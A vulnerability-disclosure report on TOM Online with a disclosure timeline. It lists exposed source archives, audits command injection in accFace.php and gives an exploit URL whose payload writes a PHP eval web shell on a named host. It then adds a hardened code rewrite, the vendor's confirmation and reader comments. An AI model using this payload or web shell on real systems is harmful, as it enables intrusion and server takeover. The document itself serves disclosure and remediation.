2013-12-23: Details reported to the vendor, awaiting vendor handling
2013-12-24: Vendor confirmed; details disclosed to the vendor only
2014-01-03: Details disclosed to core white hats and domain experts
2014-01-13: Details disclosed to ordinary white hats
2014-01-23: Details disclosed to intern white hats
2014-02-06: Details disclosed to the public
Exploiting an operations flaw at Tom Online leads directly to command execution
@xsser The TOM arbitrary file upload I posted a moment ago: I know it has already been submitted, but the vendor has not fixed it, so please notify the vendor again, thanks. I really don't know what to say about this vulnerability; the ops people and the developers really need their heads straightened out...

#1 The source code of many sites can be downloaded by anyone
http://post.news.tom.com/post.tar.gz
http://post.tom.com/post.tar.gz
http://post.weiqi.tom.com/post.tar.gz
http://post.auto.tom.com/post.tar.gz
http://post.she.tom.com/post.tar.gz
This list is probably not complete; check carefully.

#2 Extract post.tar.gz
Directory of C:\Users\Administrator\Desktop\code
2013/12/23 17:07 <DIR> .
2013/12/23 17:07 <DIR> ..
2013/12/23 16:02 <DIR> .svn
2013/12/23 16:02 <DIR> ajax
2013/12/23 16:02 <DIR> cache
2013/12/23 16:03 <DIR> channel
2013/12/23 16:02 <DIR> class
2013/12/23 16:02 <DIR> cmslog
2013/12/23 16:02 <DIR> cmslog2
2013/12/23 16:02 <DIR> cmslog3
2013/12/23 16:02 <DIR> config
2013/12/23 16:02 <DIR> cron
2013/12/23 16:02 <DIR> dyp
2013/12/23 16:03 <DIR> functions
2013/12/23 16:02 <DIR> help
2013/12/23 16:03 <DIR> images
2013/12/23 16:03 <DIR> img_tmp
2013/12/23 16:03 <DIR> include
2013/12/23 16:02 <DIR> index
2013/12/23 16:02 <DIR> infchannel
2013/12/23 16:03 <DIR> interface
2013/12/23 16:02 <DIR> lib
2013/12/23 16:02 <DIR> log
2013/12/23 16:02 <DIR> post
2013/12/23 16:02 <DIR> qa
2013/12/23 16:02 <DIR> related_news_cache
2013/12/23 16:03 <DIR> script
2013/12/23 16:02 <DIR> shell
2013/12/23 16:02 <DIR> style
2013/12/23 16:02 <DIR> template
2013/12/23 16:02 <DIR> test
2013/12/23 16:03 <DIR> testjs
2013/12/23 16:02 <DIR> tmp
2013/12/23 16:03 <DIR> userface
2011/08/01 15:56 12,288 .鏂板崕缃_0110614-20110615_.txt.swp
2009/03/25 17:17 79,215 4A000A95112.html
2011/06/24 13:36 15,583 778DV6L3.html
2010/08/04 14:28 0 a.txt
2009/03/25 17:16 623 aa.html
2009/03/25 17:16 280 aa.php
2013/12/23 17:09 2,145 accFace.php
2009/03/25 17:16 52,383 ag.php
2011/06/24 17:44 71,786 article_gallery_special.php
2011/07/12 13:22 71,085 article_gallery_special2011bai.php
2010/04/22 18:13 65,989 article_gallery_special_t.php
2010/09/16 10:59 69,760 article_gallery_v2.php
2009/03/25 17:17 57,872 article_gallery_v2_t.php
2011/06/25 11:09 73,872 article_special.php
2011/01/05 16:51 72,558 article_special2.php
2011/07/27 14:56 73,943 article_special20110726.php
2011/07/21 18:52 75,839 article_special2011bai.php
2011/07/21 18:21 75,839 article_special2011bai1.php
2011/01/28 11:07 73,794 article_special3.php
2011/06/24 14:19 74,136 article_special4.php
2009/08/14 11:09 73,268 article_special_test.php
2009/03/25 17:17 57,659 article_t.php
2009/03/25 17:17 85,644 article_v3.html
2009/03/25 17:17 56,547 article_v3_20090120_wd_bak.php
2010/09/17 17:03 70,262 article_v5.php
2009/09/28 14:30 66,067 article_v5_t.php
2010/07/27 13:00 89 asx.php
2011/03/02 17:26 867 auto_delete_nandu.php
2011/02/25 17:33 134 auto_delete_nandu.sh
2010/06/29 10:24 0 b
2009/08/20 17:00 1,553 batchcomment.php
2009/03/25 17:17 4,169 bot.php
2009/03/25 17:16 3,046 cn.php
2009/08/10 09:13 30,870 comment.php
2009/03/25 17:16 10,297 common.functions.php
2010/06/03 15:32 11,191 del.txt
2010/08/03 11:19 27,222 delete
2011/08/30 15:47 2,299,080 deleteSucc.log
2011/02/24 17:34 38 deletetmp.txt
2009/03/25 17:16 3,737 doCatalog.php
2009/03/25 17:17 1,364 doDeleteArticle.php
2009/03/25 17:16 999 doLogin.test.php
2009/03/25 17:16 1,421 doRegister.php
2009/03/25 17:17 3,938 doUpdateUser.php
2009/09/03 12:08 3,665 doUploadArticleImg.php
2010/04/22 11:01 3,636 doUploadImage.php
2009/09/03 13:11 3,740 duai.php
2010/06/07 15:18 19 env.php
2009/03/25 17:16 1,150 favicon.ico
2011/08/04 09:56 752 fazhi20110804.txt
2009/03/25 17:17 1,477 foreign.php
2009/03/25 17:16 22,414 g.php
2009/08/18 11:26 18,654 gallery.php
2009/07/06 17:29 24,891 gallery_bak.php
2009/07/09 14:21 18,660 gallery_t.php
2010/03/30 10:11 271 gettangyuan.php
2009/11/20 17:08 2,806 HanroadClass.php
2009/07/08 15:54 1,435 hwbang.php
2009/03/25 17:16 584 hwrec.php
2009/07/08 15:54 1,487 hwtag.php
2009/03/25 17:17 1,111 hyperwords.php
2009/07/24 17:57 2,362 index.html
2011/08/30 13:00 13,037 index.php
2009/03/25 17:17 12,757 index1.html
2009/03/25 17:16 311 indexStat.php
2009/07/06 18:46 61,822 index_voice.php
2009/07/06 18:23 61,494 index_voice_bak.php
2009/03/25 17:16 25 ip.php
2010/07/07 15:28 1,245 j
2010/07/07 15:30 10,588 j1
2010/07/07 15:25 36,553 jhsblynew
2010/07/07 15:25 8,172 jhsbzwnew
2009/03/25 17:17 730 link.php
2009/06/01 20:27 523 log.php
2009/07/24 17:53 2,926 login.php
2009/03/25 17:17 693 logout.php
2010/11/03 16:52 3,114 main.inc.php
2009/03/25 17:16 1,807 manageArticle.php
2009/03/25 17:16 1,059 manageArticleByCatalog.php
2009/03/25 17:17 667 manageCatalog.php
2009/03/25 17:17 630 manageUser.php
2009/03/25 17:17 597 modify_list
2009/03/25 17:17 428 msg.html
2011/02/24 18:19 24,599 nandu_end.txt
2011/02/28 15:47 191 nandu_end2011-02-28.txt
2011/03/30 15:47 152 nandu_end2011-03-30.txt
2011/03/31 15:47 152 nandu_end2011-03-31.txt
2011/04/30 15:47 86 nandu_end2011-04-30.txt
2011/05/30 15:47 154 nandu_end2011-05-30.txt
2011/05/31 15:47 154 nandu_end2011-05-31.txt
2011/06/01 15:47 0 nandu_end2011-06-01.txt
2011/06/02 15:47 13 nandu_end2011-06-02.txt
2011/06/03 15:47 13 nandu_end2011-06-03.txt
2011/06/04 15:47 13 nandu_end2011-06-04.txt
2011/06/05 15:47 13 nandu_end2011-06-05.txt
2011/06/06 15:47 13 nandu_end2011-06-06.txt
2011/06/07 15:47 13 nandu_end2011-06-07.txt
2011/06/08 15:47 13 nandu_end2011-06-08.txt
2011/06/09 15:47 13 nandu_end2011-06-09.txt
2011/06/10 15:47 26 nandu_end2011-06-10.txt
2011/06/11 15:47 26 nandu_end2011-06-11.txt
2011/06/12 15:47 26 nandu_end2011-06-12.txt
2011/06/13 15:47 39 nandu_end2011-06-13.txt
2011/06/14 15:47 39 nandu_end2011-06-14.txt
2011/06/15 15:47 52 nandu_end2011-06-15.txt
2011/06/16 15:47 65 nandu_end2011-06-16.txt
2011/06/17 15:47 78 nandu_end2011-06-17.txt
2011/06/18 15:47 78 nandu_end2011-06-18.txt
2011/06/19 15:47 78 nandu_end2011-06-19.txt
2011/06/20 15:47 91 nandu_end2011-06-20.txt
2011/06/21 15:47 91 nandu_end2011-06-21.txt
2011/06/22 15:47 91 nandu_end2011-06-22.txt
2011/06/23 15:47 91 nandu_end2011-06-23.txt
2011/06/24 15:47 91 nandu_end2011-06-24.txt
2011/06/25 15:47 91 nandu_end2011-06-25.txt
2011/06/26 15:47 91 nandu_end2011-06-26.txt
2011/06/27 15:47 116 nandu_end2011-06-27.txt
2011/06/28 15:47 116 nandu_end2011-06-28.txt
2011/06/29 15:47 116 nandu_end2011-06-29.txt
2011/06/30 15:47 116 nandu_end2011-06-30.txt
2011/07/01 15:47 13 nandu_end2011-07-01.txt
2011/07/02 15:47 26 nandu_end2011-07-02.txt
2011/07/03 15:47 26 nandu_end2011-07-03.txt
2011/07/04 15:47 50 nandu_end2011-07-04.txt
2011/07/05 15:47 50 nandu_end2011-07-05.txt
2011/07/06 15:47 86 nandu_end2011-07-06.txt
2011/07/07 15:47 86 nandu_end2011-07-07.txt
2011/07/08 15:47 110 nandu_end2011-07-08.txt
2011/07/09 15:47 110 nandu_end2011-07-09.txt
2011/07/10 15:47 110 nandu_end2011-07-10.txt
2011/07/11 15:47 110 nandu_end2011-07-11.txt
2011/07/12 15:47 110 nandu_end2011-07-12.txt
2011/07/13 15:47 110 nandu_end2011-07-13.txt
2011/07/14 15:47 110 nandu_end2011-07-14.txt
2011/07/15 15:47 110 nandu_end2011-07-15.txt
2011/07/16 15:47 110 nandu_end2011-07-16.txt
2011/07/17 15:47 110 nandu_end2011-07-17.txt
2011/07/18 15:47 110 nandu_end2011-07-18.txt
2011/07/19 15:47 110 nandu_end2011-07-19.txt
2011/07/20 15:47 110 nandu_end2011-07-20.txt
2011/07/21 15:47 110 nandu_end2011-07-21.txt
2011/07/22 15:47 110 nandu_end2011-07-22.txt
2011/07/23 15:47 110 nandu_end2011-07-23.txt
2011/07/24 15:47 110 nandu_end2011-07-24.txt
2011/07/25 15:47 110 nandu_end2011-07-25.txt
2011/07/26 15:47 121 nandu_end2011-07-26.txt
2011/07/27 15:47 146 nandu_end2011-07-27.txt
2011/07/28 15:47 159 nandu_end2011-07-28.txt
2011/07/29 15:47 159 nandu_end2011-07-29.txt
2011/07/30 15:47 159 nandu_end2011-07-30.txt
2011/07/31 15:47 159 nandu_end2011-07-31.txt
2011/08/01 15:47 0 nandu_end2011-08-01.txt
2011/08/02 15:47 0 nandu_end2011-08-02.txt
2011/08/03 15:47 0 nandu_end2011-08-03.txt
2011/08/04 15:47 0 nandu_end2011-08-04.txt
2011/08/05 15:47 0 nandu_end2011-08-05.txt
2011/08/06 15:47 0 nandu_end2011-08-06.txt
2011/08/07 15:47 0 nandu_end2011-08-07.txt
2011/08/08 15:47 0 nandu_end2011-08-08.txt
2011/08/09 15:47 12 nandu_end2011-08-09.txt
2011/08/10 15:47 12 nandu_end2011-08-10.txt
2011/08/11 15:47 12 nandu_end2011-08-11.txt
2011/08/12 15:47 12 nandu_end2011-08-12.txt
2011/08/13 15:47 12 nandu_end2011-08-13.txt
2011/08/14 15:47 12 nandu_end2011-08-14.txt
2011/08/15 15:47 12 nandu_end2011-08-15.txt
2011/08/16 15:47 12 nandu_end2011-08-16.txt
2011/08/17 15:47 25 nandu_end2011-08-17.txt
2011/08/18 15:47 25 nandu_end2011-08-18.txt
2011/08/19 15:47 25 nandu_end2011-08-19.txt
2011/08/20 15:47 25 nandu_end2011-08-20.txt
2011/08/21 15:47 25 nandu_end2011-08-21.txt
2011/08/22 15:47 25 nandu_end2011-08-22.txt
2011/08/23 15:47 38 nandu_end2011-08-23.txt
2011/08/24 15:47 38 nandu_end2011-08-24.txt
2011/08/25 15:47 50 nandu_end2011-08-25.txt
2011/08/26 15:47 63 nandu_end2011-08-26.txt
2011/08/27 15:47 63 nandu_end2011-08-27.txt
2011/08/28 15:47 63 nandu_end2011-08-28.txt
2011/08/29 15:47 63 nandu_end2011-08-29.txt
2011/08/30 15:47 63 nandu_end2011-08-30.txt
2011/01/19 16:49 8,336 nandu_new.txt
2011/02/25 16:37 24 nandu_new1.txt
2011/02/24 18:10 26,631 nandu_trans.txt
2010/06/28 14:53 611 ndylzkbak
2010/06/28 14:53 579 ndzkbak
2009/04/08 18:18 201 new
2009/04/02 15:42 850 new.php
2009/03/25 17:16 46,029 newsearch.php
2009/09/04 10:20 1,272 NewsEdit.html
2009/03/25 17:17 46,415 ourgame.php
2009/06/16 15:39 64,022 ourgame_gallery.php
2009/06/15 13:15 66,174 ourgame_v2.php
2009/05/31 10:54 18,343 out.txt
2009/03/25 17:16 3,186 pass_indexlogin.js
2009/03/25 17:17 4,262 pdnav.js
2009/03/25 17:17 614 pfprt.php
2009/03/25 17:17 31,233 pn.php
2009/07/09 17:33 3,891 PostCollector.php
2009/08/01 17:28 6,284 PPCache.php
2009/11/03 16:56 28,937 publish_news.php
2010/06/07 16:11 29,522 publish_news_t.php
2009/04/08 16:54 34,624 publish_news_v2.php
2011/04/06 17:49 180,587 qingnianbao_res.txt
2011/04/08 08:56 59,768 qingnianbao_res1.txt
2009/03/25 17:16 2,169 redirect.php
2009/03/25 17:17 2,174 redirect8.php
2009/03/25 17:16 2,209 redirect8_test.php
2009/03/25 17:17 813 register.php
2010/05/28 19:48 3,131 renming
2009/03/25 17:16 21,551 scriptt
2009/03/25 17:17 673 search.php
2009/03/25 17:17 685 searchUtf8.php
2011/05/12 10:08 577 Search_agent.html
2009/03/25 17:16 54 sitemap.html
2009/03/25 17:16 138,275 sk.html
2009/03/25 17:16 304,774 sk.js
2009/03/25 17:17 304,799 sk1.js
2011/01/28 12:06 1,510 snooker_weibo.html
2009/03/25 17:16 77,809 sport_vote_1.html
2009/03/25 17:17 1,181 status.php
2009/03/25 17:17 91,784 t.html
2009/04/13 13:17 65,423 t.php
2009/08/26 15:38 209 t0.php
2009/04/15 14:15 2,604 t1.php
2009/03/25 17:17 842 t2.php
2009/08/28 15:52 6,275 tag.php
2009/08/28 15:51 6,088 tag1.php
2009/08/28 15:47 6,147 tag20080320.php
2009/03/25 17:17 4,187 tag_list_comments.php
2009/03/25 17:16 4,488 tag_list_digs.php
2009/03/25 17:16 4,212 tag_list_tramples.php
2009/03/25 17:17 109,674 test.html
2011/08/04 10:08 455 test.php
2010/05/28 20:02 2,747 test.txt
2011/07/18 17:47 147 test2.php
2010/06/03 15:40 2,917 test2.txt
2009/03/25 17:17 388 test_article_list.php
2011/06/28 10:24 373 test_cao.php
2009/08/04 18:00 4,848 test_cms.html
2009/03/25 17:16 4,078 top.php
2009/03/25 17:17 4,053 top1h.php
2009/06/29 10:24 6,853 TPPClient.php
2009/04/09 16:29 159 trip.php
2009/03/25 17:16 832 tt.html
2009/04/10 11:39 1,169 tt.php
2009/03/25 17:16 2,771 uai.php
2009/09/03 11:55 2,683 uai_t.php
2009/09/08 10:58 932 update.php
2009/08/28 10:48 1,335 updatesmall.php
2009/09/03 13:25 2,476 uploadArticleImg.php
2009/09/22 09:45 4,832 user.php
2009/11/03 14:42 4,509 userInfo.php
2009/03/25 17:16 757 vimrc
2010/10/15 14:20 39 wcf
2010/10/13 10:41 477 wcf.php
2010/10/15 14:21 39 wcfanother
2010/10/15 14:22 39 wcfanother11
2010/10/15 14:20 39 wcfdefault
2009/03/25 17:16 57,881 weekend.php
2009/03/25 17:16 1,002 weekend_x.php
2011/06/15 11:27 81 xinhua20110614-20110615.txt
2011/06/15 11:20 84 xinhua20110614-20110615_.txt
2011/06/28 10:22 2,883 xinhua20110616-0628_new.txt
2011/06/28 15:48 2,663 xinhua20110616-0628_new_res.txt
2011/06/28 09:54 5,594 xinhua20110616.txt
2011/06/28 10:00 16,073 xinhua20110616_res.txt
2010/08/03 20:02 307 zgxwzk
2011/07/08 14:49 73,872 拷贝于 article_special.php
2011/06/15 11:20 84 鏂板崕缃_0110614-20110615_.txt
#3 A quick audit of the downloaded code: accFace.php in the root directory
<?php
//...
// Request parameters: only trimmed and URL-decoded a second time, never validated.
$faceName = urldecode(trim($_GET['faceName']));
$tmpPath = urldecode(trim($_GET['tmpPath']));
if (get_magic_quotes_gpc()) {
    $faceName = stripslashes($faceName);
    $tmpPath = stripslashes($tmpPath);
    $localPath = stripslashes($localPath);
}
// $subPath is faceName with its last path component stripped off.
$subPath = $FACE_LOCAL_PATH.preg_replace('/\\/[^\\/]+?\\w$/i', '', $faceName);
// Sink 1: faceName-derived string interpolated straight into a shell command.
if (!file_exists($subPath)) {
    @exec("mkdir -p $subPath");
}
// Sink 2: faceName and tmpPath interpolated into a second shell command.
$commandDesc = "wget -O $FACE_LOCAL_PATH$faceName $tmpPath$faceName";
exec($commandDesc);
// generate thumbnail
resizeImage($FACE_LOCAL_PATH.$faceName, $FACE_LOCAL_PATH.str_replace('.', '_s.', $faceName), $RESIZE_WIDTH, $RESIZE_HEIGHT);
?>
Lines 65-67:

if (!file_exists($subPath)) {
    @exec("mkdir -p $subPath"); // you can tell a C programmer wrote this: exec()... PHP has its own function for this (mkdir())...
}

$subPath is built from the unfiltered faceName parameter, so this is arbitrary command execution. The same faceName (together with tmpPath) is then interpolated into the wget command line on the next exec() call, again without escapeshellarg(), so any shell metacharacter in the request is interpreted by the shell that exec() spawns.

#4 Exploitation: requesting accFace.php directly discloses the absolute path of the web root. Fine, then let's write a shell there...
We set the faceName parameter to:

aa || echo '<?php eval($_POST[cmd]);?>It works' >/data/webroot/post/tom.php

URL-encoded:
aa%20%7C%7C%20echo%20'<%3Fphp%20eval(%24_POST%5Bcmd%5D)%3B%3F>It%20works'%20>%2Fdata%2Fwebroot%2Fpost%2Ftom.php
Submitted via GET:
http://post.news.tom.com/accFace.php?faceName=aa%20%7C%7C%20echo%20'%3C%3Fphp%20eval(%24_POST%5Bcmd%5D)%3B%3F%3EIt%20works'%20%3E%2Fdata%2Fwebroot%2Fpost%2Ftom.php&tmpPath=1&localPath=1
The command executes and tom.php is created in the web root.

#5 Shell demo

Delete or rename the backup files, and review the code properly. Haha, I found you such a serious vulnerability, is there a gift?
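As an added example (this is not TOM's code and not part of the original report), here is how the accFace.php fragment quoted above can be rewritten so that no request parameter ever reaches a shell. It keeps the original's inputs and outputs and assumes, as the quoted snippet does, that $FACE_LOCAL_PATH (ending in a slash), $RESIZE_WIDTH, $RESIZE_HEIGHT and resizeImage() are defined in the elided part of the file; the allowed download host list is a hypothetical placeholder. Three things change: faceName is checked against a strict allowlist pattern instead of being urldecode()d a second time (PHP has already decoded $_GET, so the extra urldecode only helps an attacker smuggle double-encoded characters past a filter or WAF), the directory is created with mkdir() rather than exec("mkdir -p ..."), and the image is fetched with a PHP stream instead of wget, so there is no command line for "||" to break out of.

```php
<?php
// Added hardened rewrite of the accFace.php fragment quoted above (example
// code, not TOM's). Assumes $FACE_LOCAL_PATH (with trailing slash),
// $RESIZE_WIDTH, $RESIZE_HEIGHT and resizeImage() come from the elided part
// of the original file. The host list below is a hypothetical placeholder.
$ALLOWED_TMP_HOSTS = array('img-tmp.example.internal');

function fail($msg)
{
    header('HTTP/1.0 400 Bad Request');
    exit($msg);
}

// $_GET is already URL-decoded by PHP; do not decode it a second time.
$faceName = isset($_GET['faceName']) ? trim($_GET['faceName']) : '';
$tmpPath  = isset($_GET['tmpPath'])  ? trim($_GET['tmpPath'])  : '';

// 1. Allowlist the shape of faceName: up to three directory components and a
//    file name, all from [A-Za-z0-9_], plus an image extension. Spaces,
//    quotes, |, ;, $, backticks, ".." and leading slashes are all rejected,
//    so the value can escape neither $FACE_LOCAL_PATH nor a command line.
if (!preg_match('#^(?:[A-Za-z0-9_]+/){0,3}[A-Za-z0-9_]+\.(?:jpe?g|png|gif)$#', $faceName)) {
    fail('invalid faceName');
}

// 2. Pin tmpPath to an expected scheme and host instead of trusting it.
$u = parse_url($tmpPath);
if ($u === false || !isset($u['scheme'], $u['host'])
    || $u['scheme'] !== 'http' || !in_array($u['host'], $ALLOWED_TMP_HOSTS, true)) {
    fail('invalid tmpPath');
}

$dest = $FACE_LOCAL_PATH . $faceName;
$src  = $tmpPath . $faceName;   // same concatenation the original used

// 3. Create the directory with PHP's own mkdir(), not exec("mkdir -p ...").
$subPath = dirname($dest);
if (!is_dir($subPath) && !mkdir($subPath, 0755, true)) {
    fail('cannot create directory');
}

// 4. Fetch the file with a stream instead of shelling out to wget; with no
//    shell involved there is nothing for metacharacters to inject into.
//    getimagesizefromstring() (PHP >= 5.4) rejects non-image payloads.
$ctx  = stream_context_create(array('http' => array('timeout' => 10, 'follow_location' => 0)));
$data = @file_get_contents($src, false, $ctx);
if ($data === false || getimagesizefromstring($data) === false) {
    fail('download failed or not an image');
}
if (file_put_contents($dest, $data, LOCK_EX) === false) {
    fail('write failed');
}

// Thumbnail, as in the original.
resizeImage($dest, $FACE_LOCAL_PATH . str_replace('.', '_s.', $faceName), $RESIZE_WIDTH, $RESIZE_HEIGHT);
?>
```

With the payload from this report as faceName, the first preg_match() fails and the script stops with a 400 before any file system or network operation runs. If shelling out really were unavoidable, every interpolated value would have to go through escapeshellarg(), as in exec('wget -O ' . escapeshellarg($dest) . ' ' . escapeshellarg($src)), but removing the shell altogether is the stronger fix and also removes the dependency on wget being installed.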
Severity: High
Vulnerability Rank: 13
Confirmed at: 2013-12-24 10:58
Many thanks for your help to TOM Online; we will deal with this as soon as possible. We have created a technical exchange QQ group for reporters who support TOM Online: 328442670. We hope you and more members will join so that everyone can exchange ideas. After internal approval, TOM Online will also send gifts to reporters from time to time in recognition of your support for TOM Online.
None yet
Lightning, lightning, lightning!
Here to pay my respects
The exploitation method must be a novel one
Lightning!!
Snap!
@TOM在线 Only rank 13? It seems your understanding of security really isn't much.
TOM Online's scoring seems pretty arbitrary
Heh, it finally got exposed
mark
@Mr.leo My score is a bit too low to see the details...
@HackBraid Switch to your main account, ha
@HackBraid I've seen the details, you can ask me
Source code analysis, as expected, heh. Whoever leaves source backups lying around deserves it.
Nice! Very detailed! Great teaching material!
Very detailed, learned something